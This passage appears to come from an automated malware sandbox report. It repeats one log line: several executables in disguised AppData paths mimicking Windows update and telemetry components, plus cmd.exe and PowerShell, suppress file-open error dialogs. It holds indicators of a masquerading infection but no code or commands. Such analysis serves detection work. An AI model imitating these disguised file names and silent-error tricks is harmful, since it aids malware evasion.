Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
